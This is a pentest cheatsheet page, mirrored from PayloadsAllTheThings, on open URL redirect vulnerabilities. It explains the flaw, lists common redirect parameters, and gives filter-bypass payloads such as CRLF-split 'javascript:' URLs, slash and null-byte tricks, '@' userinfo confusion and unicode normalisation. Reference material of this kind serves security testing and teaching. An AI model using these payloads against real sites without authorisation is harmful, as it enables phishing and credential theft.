daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (8355B)


      1 ---
      2 title: "Open URL Redirect"
      3 topic: "Open Redirect"
      4 topicSlug: "open-redirect"
      5 sourcePath: "Open Redirect/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Open%20Redirect/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Open URL Redirect
     12 
     13 > Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
     14 
     15 ## Summary
     16 
     17 * [Methodology](#methodology)
     18     * [HTTP Redirection Status Code](#http-redirection-status-code)
     19     * [Redirect Methods](#redirect-methods)
     20         * [Path-based Redirects](#path-based-redirects)
     21         * [JavaScript-based Redirects](#javascript-based-redirects)
     22         * [Common Query Parameters](#common-query-parameters)
     23     * [Filter Bypass](#filter-bypass)
     24 * [Labs](#labs)
     25 * [References](#references)
     26 
     27 ## Methodology
     28 
     29 An open redirect vulnerability occurs when a web application or server uses unvalidated, user-supplied input to redirect users to other sites. This can allow an attacker to craft a link to the vulnerable site which redirects to a malicious site of their choosing.
     30 
     31 Attackers can leverage this vulnerability in phishing campaigns, session theft, or forcing a user to perform an action without their consent.
     32 
     33 **Example**: A web application has a feature that allows users to click on a link and be automatically redirected to a saved preferred homepage. This might be implemented like so:
     34 
     35 ```ps1
     36 https://example.com/redirect?url=https://userpreferredsite.com
     37 ```
     38 
     39 An attacker could exploit an open redirect here by replacing the `userpreferredsite.com` with a link to a malicious website. They could then distribute this link in a phishing email or on another website. When users click the link, they're taken to the malicious website.
     40 
     41 ## HTTP Redirection Status Code
     42 
     43 HTTP Redirection status codes, those starting with 3, indicate that the client must take additional action to complete the request. Here are some of the most common ones:
     44 
     45 * [300 Multiple Choices](https://httpstatuses.com/300) - This indicates that the request has more than one possible response. The client should choose one of them.
     46 * [301 Moved Permanently](https://httpstatuses.com/301) - This means that the resource requested has been permanently moved to the URL given by the Location headers. All future requests should use the new URI.
     47 * [302 Found](https://httpstatuses.com/302) - This response code means that the resource requested has been temporarily moved to the URL given by the Location headers. Unlike 301, it does not mean that the resource has been permanently moved, just that it is temporarily located somewhere else.
     48 * [303 See Other](https://httpstatuses.com/303) - The server sends this response to direct the client to get the requested resource at another URI with a GET request.
     49 * [304 Not Modified](https://httpstatuses.com/304) - This is used for caching purposes. It tells the client that the response has not been modified, so the client can continue to use the same cached version of the response.
     50 * [305 Use Proxy](https://httpstatuses.com/305) -  The requested resource must be accessed through a proxy provided in the Location header.
     51 * [307 Temporary Redirect](https://httpstatuses.com/307) - This means that the resource requested has been temporarily moved to the URL given by the Location headers, and future requests should still use the original URI.
     52 * [308 Permanent Redirect](https://httpstatuses.com/308) - This means the resource has been permanently moved to the URL given by the Location headers, and future requests should use the new URI. It is similar to 301 but does not allow the HTTP method to change.
     53 
     54 ## Redirect Methods
     55 
     56 ### Path-based Redirects
     57 
     58 Instead of query parameters, redirection logic may rely on the path:
     59 
     60 * Using slashes in URLs: `https://example.com/redirect/http://malicious.com`
     61 * Injecting relative paths: `https://example.com/redirect/../http://malicious.com`
     62 
     63 ### JavaScript-based Redirects
     64 
     65 If the application uses JavaScript for redirects, attackers may manipulate script variables:
     66 
     67 **Example**:
     68 
     69 ```js
     70 var redirectTo = "http://trusted.com";
     71 window.location = redirectTo;
     72 ```
     73 
     74 **Payload**: `?redirectTo=http://malicious.com`
     75 
     76 ### Common Query Parameters
     77 
     78 ```powershell
     79 ?checkout_url={payload}
     80 ?continue={payload}
     81 ?dest={payload}
     82 ?destination={payload}
     83 ?go={payload}
     84 ?image_url={payload}
     85 ?next={payload}
     86 ?redir={payload}
     87 ?redirect_uri={payload}
     88 ?redirect_url={payload}
     89 ?redirect={payload}
     90 ?return_path={payload}
     91 ?return_to={payload}
     92 ?return={payload}
     93 ?returnTo={payload}
     94 ?rurl={payload}
     95 ?target={payload}
     96 ?url={payload}
     97 ?view={payload}
     98 /{payload}
     99 /redirect/{payload}
    100 ```
    101 
    102 ## Filter Bypass
    103 
    104 * Using a whitelisted domain or keyword
    105 
    106     ```powershell
    107     www.whitelisted.com.evil.com redirect to evil.com
    108     ```
    109 
    110 * Using **CRLF** to bypass "javascript" blacklisted keyword
    111 
    112     ```powershell
    113     java%0d%0ascript%0d%0a:alert(0)
    114     ```
    115 
    116 * Using "`//`" and "`////`" to bypass "http" blacklisted keyword
    117 
    118     ```powershell
    119     //google.com
    120     ////google.com
    121     ```
    122 
    123 * Using "https:" to bypass "`//`" blacklisted keyword
    124 
    125     ```powershell
    126     https:google.com
    127     ```
    128 
    129 * Using "`\/\/`" to bypass "`//`" blacklisted keyword
    130 
    131     ```powershell
    132     \/\/google.com/
    133     /\/google.com/
    134     ```
    135 
    136 * Using "`%E3%80%82`" to bypass "." blacklisted character
    137 
    138     ```powershell
    139     /?redir=google。com
    140     //google%E3%80%82com
    141     ```
    142 
    143 * Using null byte "`%00`" to bypass blacklist filter
    144 
    145     ```powershell
    146     //google%00.com
    147     ```
    148 
    149 * Using HTTP Parameter Pollution
    150 
    151     ```powershell
    152     ?next=whitelisted.com&next=google.com
    153     ```
    154 
    155 * Using "@" character. [Common Internet Scheme Syntax](https://datatracker.ietf.org/doc/html/rfc1738)
    156 
    157     ```powershell
    158     //<user>:<password>@<host>:<port>/<url-path>
    159     http://www.theirsite.com@yoursite.com/
    160     ```
    161 
    162 * Creating folder as their domain
    163 
    164     ```powershell
    165     http://www.yoursite.com/http://www.theirsite.com/
    166     http://www.yoursite.com/folder/www.folder.com
    167     ```
    168 
    169 * Using "`?`" character, browser will translate it to "`/?`"
    170 
    171     ```powershell
    172     http://www.yoursite.com?http://www.theirsite.com/
    173     http://www.yoursite.com?folder/www.folder.com
    174     ```
    175 
    176 * Host/Split Unicode Normalization
    177 
    178     ```powershell
    179     https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
    180     http://a.com/X.b.com
    181     ```
    182 
    183 ## Labs
    184 
    185 * [Root Me - HTTP - Open redirect](https://www.root-me.org/fr/Challenges/Web-Serveur/HTTP-Open-redirect)
    186 * [PortSwigger - DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection)
    187 
    188 ## References
    189 
    190 * [Host/Split Exploitable Antipatterns in Unicode Normalization - Jonathan Birch - August 3, 2019](https://web.archive.org/web/20190819081715/https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf)
    191 * [Open Redirect Cheat Sheet - PentesterLand - November 2, 2018](https://web.archive.org/web/20190719012735/https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
    192 * [Open Redirect Vulnerability - s0cket7 - August 15, 2018](https://web.archive.org/web/20180816184136/https://s0cket7.com/open-redirect-vulnerability/)
    193 * [Open-Redirect-Payloads - Predrag Cujanović - April 24, 2017](https://github.com/cujanovic/Open-Redirect-Payloads)
    194 * [Unvalidated Redirects and Forwards Cheat Sheet - OWASP - February 28, 2024](https://web.archive.org/web/20130423163025/https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
    195 * [You do not need to run 80 reconnaissance tools to get access to user accounts - Stefano Vettorazzi (@stefanocoding) - May 16, 2019](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)